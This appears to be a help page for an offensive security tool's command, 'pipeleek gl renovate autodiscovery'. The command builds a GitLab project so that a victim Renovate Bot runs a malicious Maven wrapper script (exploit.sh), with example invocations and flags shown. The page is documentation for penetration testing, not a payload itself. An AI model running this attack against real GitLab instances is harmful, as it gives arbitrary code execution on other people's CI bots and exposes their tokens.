Autodiscovery
pipeleek gl renovate autodiscovery
Create a PoC for Renovate Autodiscovery misconfigurations exploitation
Synopsis
Create a project with a Renovate Bot configuration that will be picked up by an existing Renovate Bot user. The Renovate Bot will execute the malicious Maven wrapper script during dependency updates, which you can customize in exploit.sh.
| pipeleek gl renovate autodiscovery [flags]
|
Examples
| # Create a project and invite the victim Renovate Bot user to it. Uses the Maven wrapper to execute arbitrary code during dependency updates.
pipeleek gl renovate autodiscovery --token glpat-xxxxxxxxxxx --url https://gitlab.mydomain.com --project-name my-exploit-project --username renovate-bot-user
# Create a project with a CI/CD pipeline for local testing (requires setting RENOVATE_TOKEN as CI/CD variable)
pipeleek gl renovate autodiscovery --token glpat-xxxxxxxxxxx --url https://gitlab.mydomain.com --project-name my-exploit-project --add-renovate-cicd-for-debugging
|
Options
| --add-renovate-cicd-for-debugging Creates a .gitlab-ci.yml file in the repo that runs Renovate Bot for local testing
-h, --help help for autodiscovery
-p, --project-name string The name for the created project
-n, --username string The username of the victim Renovate Bot user to invite
|
Options inherited from parent commands
| --color Enable colored log output (auto-disabled when using --logfile) (default true)
--config string Config file path. Example: ~/.config/pipeleek/pipeleek.yaml
--ignore-proxy Ignore HTTP_PROXY environment variable
--json Use JSON as log output format
--log-level string Set log level globally (debug, info, warn, error). Example: --log-level=warn
-l, --logfile string Log output to a file
-t, --token string GitLab API Token
-u, --url string GitLab instance URL
-v, --verbose Enable debug logging (shortcut for --log-level=debug)
|
SEE ALSO